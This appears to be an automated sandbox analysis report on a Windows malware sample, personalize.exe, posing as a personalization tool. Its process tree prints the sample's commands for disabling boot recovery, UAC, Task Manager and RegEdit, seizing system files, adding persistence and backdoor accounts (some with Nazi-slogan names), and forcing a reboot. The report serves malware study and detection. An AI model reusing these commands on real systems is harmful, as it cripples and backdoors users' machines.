Analysis
max time kernel: 63s
max time network: 66s
platform: windows11-21h2_x64
resource: win11-20240508-en
resource tags: arch:x64, arch:x86, image:win11-20240508-en, locale:en-us, os:windows11-21h2-x64, system
submitted: 30-06-2024 13:55
Static task: static1
Behavioral task: behavioral1
Sample: personalize.exe
Resource: win11-20240508-en
Errors
General
Target: personalize.exe
Size: 832KB
MD5: 3780f9b91fde991c40386927dae15096
SHA1: 0ac6c6284751dd0bac7d58714f899c16da63256a
SHA256: 8fdbf406fc7490ac24b4c5f61a4b868bd1c892f5ccc4817ec306a8ec9f70e3d7
SHA512: f5fcba684cb2b4d8c6000649140e693d1589e7f42cccbd9592d82d4c3c2c2cb635f3c851bdb2c95aa0bb8ed7872c9b6a55d7dec4734ca2da429b257e41246e2c
SSDEEP: 24576:StA4KdTxn+SoA/baP35yfbSLF2aYVlHvAclDJDb:jdTlzV+P35yfsFI3vAclxb
Malware Config
Signatures
UAC bypass
Processes (description | ioc | process):
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | reg.exe

Modifies boot configuration data using bcdedit 1 TTPs 1 IoCs

Disables RegEdit via registry modification 1 IoCs
Processes (description | ioc | process):
  Set value (int) | \REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" | reg.exe

Disables Task Manager via registry modification

Possible privilege escalation attempt 6 IoCs
Processes (pid | process):
  5040 | takeown.exe
  4004 | icacls.exe
  3412 | takeown.exe
  4912 | icacls.exe
  3032 | takeown.exe
  3284 | icacls.exe
Sets file to hidden 1 TTPs 2 IoCs
Modifies file attributes to stop it showing in Explorer etc.
Processes (pid | process):
  4584 | attrib.exe
  1224 | attrib.exe

Modifies file permissions 1 TTPs 6 IoCs
Processes (pid | process):
  5040 | takeown.exe
  4004 | icacls.exe
  3412 | takeown.exe
  4912 | icacls.exe
  3032 | takeown.exe
  3284 | icacls.exe

Adds Run key to start application 2 TTPs 1 IoCs
Processes (description | ioc | process):
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows NT Personalization tool = "C:\\Windows\\System32\\winnt64.exe" | reg.exe

File and Directory Permissions Modification: Windows File and Directory Permissions Modification 1 TTPs

Drops file in System32 directory 13 IoCs
Processes (description | ioc | process):
  File opened for modification | C:\Windows\System32\screenmelt.exe | cmd.exe
  File opened for modification | C:\Windows\System32\mbr.exe | attrib.exe
  File opened for modification | C:\Windows\System32\mmc.exe | cmd.exe
  File opened for modification | C:\Windows\System32\taskmgr.exe | cmd.exe
  File opened for modification | C:\Windows\System32\msiexec.exe | cmd.exe
  File created | C:\Windows\System32\colorcmd.exe | cmd.exe
  File created | C:\Windows\System32\screenmelt.exe | cmd.exe
  File created | C:\Windows\System32\mbr.exe | cmd.exe
  File opened for modification | C:\Windows\System32\colorcmd.exe | cmd.exe
  File opened for modification | C:\Windows\system32\winnt64.exe | cmd.exe
  File opened for modification | C:\Windows\System32\mbr.exe | cmd.exe
  File created | C:\Windows\system32\winnt64.exe | cmd.exe
  File opened for modification | C:\Windows\System32\winnt64.exe | attrib.exe
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes (description | ioc | process):
  Set value (str) | \REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000\Control Panel\Desktop\Wallpaper = "C:\\Windows\\Web\\winntcus64.png" | reg.exe

Drops file in Windows directory 2 IoCs
Processes (description | ioc | process):
  File opened for modification | C:\Windows\Web\winntcus64.png | cmd.exe
  File created | C:\Windows\Web\winntcus64.png | cmd.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

Delays execution with timeout.exe 3 IoCs
Processes (pid | process):
  1748 | timeout.exe
  224 | timeout.exe
  1872 | timeout.exe

Enumerates system info in registry 2 TTPs 3 IoCs
Processes (description | ioc | process):
  Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | msedge.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | msedge.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | msedge.exe

Modifies data under HKEY_USERS 15 IoCs
Processes (description | ioc | process):
  Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10" | LogonUI.exe
  Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "70" | LogonUI.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent | LogonUI.exe
  Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = 99ebff004cc2ff000091f8000078d4000067c000003e9200001a6800f7630c00 | LogonUI.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History | LogonUI.exe
  Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292114432" | LogonUI.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM | LogonUI.exe
  Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292114432" | LogonUI.exe
  Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4290799360" | LogonUI.exe
  Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89" | LogonUI.exe
  Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0" | LogonUI.exe
  Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365268" | LogonUI.exe
  Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365268" | LogonUI.exe
  Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1" | LogonUI.exe
  Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1" | LogonUI.exe
Runs net.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs
Processes (pid | process):
  4876 | msedge.exe
  4876 | msedge.exe
  3676 | msedge.exe
  3676 | msedge.exe
  2092 | msedge.exe
  2092 | msedge.exe
  4864 | identity_helper.exe
  4864 | identity_helper.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 13 IoCs
Processes (pid | process):
  3676 | msedge.exe (the same entry is listed 13 times)

Suspicious use of AdjustPrivilegeToken 5 IoCs
Processes (description | pid | process):
  Token: SeTakeOwnershipPrivilege | 5040 | takeown.exe
  Token: SeTakeOwnershipPrivilege | 3412 | takeown.exe
  Token: SeTakeOwnershipPrivilege | 3032 | takeown.exe
  Token: SeShutdownPrivilege | 3784 | shutdown.exe
  Token: SeRemoteShutdownPrivilege | 3784 | shutdown.exe

Suspicious use of FindShellTrayWindow 25 IoCs
Processes (pid | process):
  3676 | msedge.exe (the same entry is listed 25 times)

Suspicious use of SendNotifyMessage 12 IoCs
Processes (pid | process):
  3676 | msedge.exe (the same entry is listed 12 times)

Suspicious use of SetWindowsHookEx 2 IoCs
Processes (pid | process):
  4928 | PickerHost.exe
  2820 | LogonUI.exe

Suspicious use of WriteProcessMemory 64 IoCs
Processes (source pid process -> target pid process; every entry appears twice in the original table, giving 64 IoCs):
  4476 personalize.exe -> 2800 cmd.exe
  2800 cmd.exe -> 856 choice.exe
  2800 cmd.exe -> 892 choice.exe
  2800 cmd.exe -> 2316 bcdedit.exe
  2800 cmd.exe -> 780 cmd.exe
  2800 cmd.exe -> 1464 cmd.exe
  2800 cmd.exe -> 4584 attrib.exe
  2800 cmd.exe -> 5040 takeown.exe
  2800 cmd.exe -> 4004 icacls.exe
  2800 cmd.exe -> 3412 takeown.exe
  2800 cmd.exe -> 4912 icacls.exe
  2800 cmd.exe -> 3032 takeown.exe
  2800 cmd.exe -> 3284 icacls.exe
  2800 cmd.exe -> 4108 reg.exe
  2800 cmd.exe -> 2956 rundll32.exe
  2800 cmd.exe -> 1768 reg.exe
  2800 cmd.exe -> 1224 attrib.exe
  2800 cmd.exe -> 4924 reg.exe
  2800 cmd.exe -> 3052 reg.exe
  2800 cmd.exe -> 3580 reg.exe
  2800 cmd.exe -> 2828 reg.exe
  2800 cmd.exe -> 4580 reg.exe
  2800 cmd.exe -> 4064 reg.exe
  2800 cmd.exe -> 860 reg.exe
  2800 cmd.exe -> 968 reg.exe
  2800 cmd.exe -> 948 reg.exe
  2800 cmd.exe -> 4520 reg.exe
  2800 cmd.exe -> 1352 reg.exe
  2800 cmd.exe -> 4940 net.exe
  4940 net.exe -> 4832 net1.exe
  2800 cmd.exe -> 2396 net.exe
  2396 net.exe -> 2288 net1.exe

Views/modifies file attributes 1 TTPs 2 IoCs
Processes (pid | process):
  4584 | attrib.exe
  1224 | attrib.exe
Processes (tree indented by depth; each line is image path | command line; the bullets beneath a process are the signatures it triggered)
C:\Users\Admin\AppData\Local\Temp\personalize.exe | "C:\Users\Admin\AppData\Local\Temp\personalize.exe"
  - Suspicious use of WriteProcessMemory
  C:\Windows\system32\cmd.exe | "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\6234.tmp\6235.tmp\6236.bat C:\Users\Admin\AppData\Local\Temp\personalize.exe"
    - Drops file in System32 directory
    - Drops file in Windows directory
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\choice.exe | choice /c yn /n /m ""
    C:\Windows\system32\choice.exe | choice /c yn /n /m ""
    C:\Windows\system32\bcdedit.exe | bcdedit /set {default} recoveryenabled no
      - Modifies boot configuration data using bcdedit
    C:\Windows\system32\cmd.exe | cmd.exe
    C:\Windows\system32\cmd.exe | cmd.exe
    C:\Windows\system32\attrib.exe | attrib +s +h C:\Windows\System32\mbr.exe
      - Sets file to hidden
      - Drops file in System32 directory
      - Views/modifies file attributes
    C:\Windows\system32\takeown.exe | takeown /F "C:\Windows\system32\taskmgr.exe"
      - Possible privilege escalation attempt
      - Modifies file permissions
      - Suspicious use of AdjustPrivilegeToken
    C:\Windows\system32\icacls.exe | icacls "C:\windows\system32\taskmgr.exe" /grant everyone:F
      - Possible privilege escalation attempt
      - Modifies file permissions
    C:\Windows\system32\takeown.exe | takeown /F "C:\Windows\system32\mmc.exe"
      - Possible privilege escalation attempt
      - Modifies file permissions
      - Suspicious use of AdjustPrivilegeToken
    C:\Windows\system32\icacls.exe | icacls "C:\windows\system32\mmc.exe" /grant everyone:F
      - Possible privilege escalation attempt
      - Modifies file permissions
    C:\Windows\system32\takeown.exe | takeown /F "C:\Windows\system32\msiexec.exe"
      - Possible privilege escalation attempt
      - Modifies file permissions
      - Suspicious use of AdjustPrivilegeToken
    C:\Windows\system32\icacls.exe | icacls "C:\windows\system32\msiexec.exe" /grant everyone:F
      - Possible privilege escalation attempt
      - Modifies file permissions
    C:\Windows\system32\reg.exe | reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Windows\Web\winntcus64.png" /f
      - Sets desktop wallpaper using registry
    C:\Windows\system32\rundll32.exe | RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
    C:\Windows\system32\reg.exe | reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
      - UAC bypass
    C:\Windows\system32\attrib.exe | attrib +s +h C:\Windows\System32\winnt64.exe
      - Sets file to hidden
      - Drops file in System32 directory
      - Views/modifies file attributes
    C:\Windows\system32\reg.exe | reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Windows NT Personalization tool" /T REG_SZ /F /D "C:\Windows\System32\winnt64.exe"
      - Adds Run key to start application
    C:\Windows\system32\reg.exe | reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
    C:\Windows\system32\reg.exe | reg add "HKCU\SOFTWARE\Policies\Microsoft\Windows\System" /v DisableCMD /t REG_DWORD /d 2 /f
    C:\Windows\system32\reg.exe | reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop" /v NoChangingWallpaper /t REG_DWORD /d 1 /f
    C:\Windows\system32\reg.exe | reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REG_DWORD /d 1 /f
    C:\Windows\system32\reg.exe | reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoClose /t REG_DWORD /d 1 /f
    C:\Windows\system32\reg.exe | reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoRun /t REG_DWORD /d 1 /f
    C:\Windows\system32\reg.exe | reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoThemesTab /t REG_DWORD /d 1 /f
    C:\Windows\system32\reg.exe | reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFind /t REG_DWORD /d 1 /f
    C:\Windows\system32\reg.exe | reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoDrives /t REG_DWORD /d 1 /f
    C:\Windows\system32\reg.exe | reg add "HKCU\Control Panel\Mouse" /v SwapMouseButtons /t REG_SZ /d 1 /f
    C:\Windows\system32\net.exe | net user /add NTCUS ntcus123
      - Suspicious use of WriteProcessMemory
      C:\Windows\system32\net1.exe | C:\Windows\system32\net1 user /add NTCUS ntcus123
    C:\Windows\system32\net.exe | net user /add NTUSER ntcus124
      - Suspicious use of WriteProcessMemory
      C:\Windows\system32\net1.exe | C:\Windows\system32\net1 user /add NTUSER ntcus124
    C:\Windows\system32\net.exe | net user /add NTDAT ntpersonalize
      C:\Windows\system32\net1.exe | C:\Windows\system32\net1 user /add NTDAT ntpersonalize
    C:\Windows\system32\net.exe | net user /add DC discord
      C:\Windows\system32\net1.exe | C:\Windows\system32\net1 user /add DC discord
    C:\Windows\system32\net.exe | net user /add cfs belgium
      C:\Windows\system32\net1.exe | C:\Windows\system32\net1 user /add cfs belgium
    C:\Windows\system32\net.exe | net user /add leopoldII belgium
      C:\Windows\system32\net1.exe | C:\Windows\system32\net1 user /add leopoldII belgium
    C:\Windows\system32\net.exe | net user /add SCHJIEAB rykn
      C:\Windows\system32\net1.exe | C:\Windows\system32\net1 user /add SCHJIEAB rykn
    C:\Windows\system32\net.exe | net user /add IZWYOKWYIEN rykn
      C:\Windows\system32\net1.exe | C:\Windows\system32\net1 user /add IZWYOKWYIEN rykn
    C:\Windows\system32\net.exe | net user /add asap asap
      C:\Windows\system32\net1.exe | C:\Windows\system32\net1 user /add asap asap
    C:\Windows\system32\net.exe | net user /add REICHTANGLE ig1
      C:\Windows\system32\net1.exe | C:\Windows\system32\net1 user /add REICHTANGLE ig1
    C:\Windows\system32\net.exe | net user /add SIEGHEIL hitler
      C:\Windows\system32\net1.exe | C:\Windows\system32\net1 user /add SIEGHEIL hitler
    C:\Windows\system32\reg.exe | reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v DisableLogonBackgroundImage /t REG_DWORD /d 1 /f
    C:\Windows\system32\reg.exe | reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent" /v AccentColor /t REG_DWORD /d 0xFF0000 /f
    C:\Windows\system32\reg.exe | reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t REG_DWORD /d 1 /f
      - Disables RegEdit via registry modification
    C:\Windows\system32\timeout.exe | timeout /t 15 /nobreak
      - Delays execution with timeout.exe
    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.google.com/search?q=HAHAHAHAHAHA
      - Enumerates system info in registry
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
      - Suspicious use of FindShellTrayWindow
      - Suspicious use of SendNotifyMessage
      C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x10c,0x110,0x114,0xdc,0x118,0x7ffce8da3cb8,0x7ffce8da3cc8,0x7ffce8da3cd8
      C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1992,3995217150390661011,12946379211143329489,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=2020 /prefetch:2
      C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1992,3995217150390661011,12946379211143329489,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2144 /prefetch:3
        - Suspicious behavior: EnumeratesProcesses
      C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1992,3995217150390661011,12946379211143329489,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2588 /prefetch:8
      C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1992,3995217150390661011,12946379211143329489,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3324 /prefetch:1
      C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1992,3995217150390661011,12946379211143329489,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3336 /prefetch:1
      C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1992,3995217150390661011,12946379211143329489,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4948 /prefetch:1
      C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1992,3995217150390661011,12946379211143329489,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4892 /prefetch:8
        - Suspicious behavior: EnumeratesProcesses
      C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1992,3995217150390661011,12946379211143329489,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3388 /prefetch:1
      C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1992,3995217150390661011,12946379211143329489,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4956 /prefetch:1
      C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1992,3995217150390661011,12946379211143329489,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3872 /prefetch:8
        - Suspicious behavior: EnumeratesProcesses
      C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1992,3995217150390661011,12946379211143329489,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5428 /prefetch:1
      C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1992,3995217150390661011,12946379211143329489,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5408 /prefetch:1
      C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1992,3995217150390661011,12946379211143329489,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5932 /prefetch:1
      C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1992,3995217150390661011,12946379211143329489,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6096 /prefetch:1
      C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1992,3995217150390661011,12946379211143329489,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4760 /prefetch:1
      C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1992,3995217150390661011,12946379211143329489,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4964 /prefetch:1
      C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1992,3995217150390661011,12946379211143329489,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1708 /prefetch:1
      C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1992,3995217150390661011,12946379211143329489,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3740 /prefetch:1
    C:\Windows\system32\timeout.exe | timeout /t 15 /nobreak
      - Delays execution with timeout.exe
    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.google.com/search?q=russian+democratic+federative+republic
      C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffce8da3cb8,0x7ffce8da3cc8,0x7ffce8da3cd8
    C:\Windows\system32\timeout.exe | timeout /t 15 /nobreak
      - Delays execution with timeout.exe
    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.google.com/search?q=moskau+moskau
      C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffce8da3cb8,0x7ffce8da3cc8,0x7ffce8da3cd8
    C:\Windows\system32\shutdown.exe | shutdown /r /t 3 /c "id like to see you fix this lol"
      - Suspicious use of AdjustPrivilegeToken
C:\Windows\System32\CompPkgSrv.exe | C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe | C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\PickerHost.exe | C:\Windows\System32\PickerHost.exe -Embedding
  - Suspicious use of SetWindowsHookEx
C:\Windows\system32\LogonUI.exe | "LogonUI.exe" /flags:0x4 /state0:0xa3a3c855 /state1:0x41c64e6d
  - Modifies data under HKEY_USERS
  - Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Matrix (ATT&CK v13; the number after each entry is the count of matching signatures)
Privilege Escalation
  Abuse Elevation Control Mechanism (1)
    Bypass User Account Control (1)
  Boot or Logon Autostart Execution (1)
    Registry Run Keys / Startup Folder (1)
Defense Evasion
  Abuse Elevation Control Mechanism (1)
    Bypass User Account Control (1)
  Impair Defenses (1)
    Disable or Modify Tools (1)
  Modify Registry (3)
  Hide Artifacts (2)
    Hidden Files and Directories (2)
  File and Directory Permissions Modification (2)
    Windows File and Directory Permissions Modification (1)
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.datFilesize
152B
MD58f2eb94e31cadfb6eb07e6bbe61ef7ae
SHA13f42b0d5a90408689e7f7941f8db72a67d5a2eab
SHA256d222c8e3b19cda2657629a486faf32962e016fc66561ce0d17010afdb283c9de
SHA5129f7f84149885b851e0bf7173c540e466a2b2eb9907d8b608f60360933328cc75d9d1b63640ea4ecc1e64ecc5dd7ee74d82903f96a8b4418ca56296641a8c0703
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.datFilesize
152B
MD5d56e8f308a28ac4183257a7950ab5c89
SHA1044969c58cef041a073c2d132fa66ccc1ee553fe
SHA2560bc24451c65457abc1e4e340be2f8faceae6b6ec7768a21d44bcd14636543bae
SHA512fd5798559f4025ec3408f5550b8671d394b1ec83b85fdac8c005b0cc3e183272bdd07db15a156a572c9c5e5798badf235dc10aae62a052efa8dd9dfdbdca8189
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
5KB
MD562ec395204e0aae9915a3b732f94082d
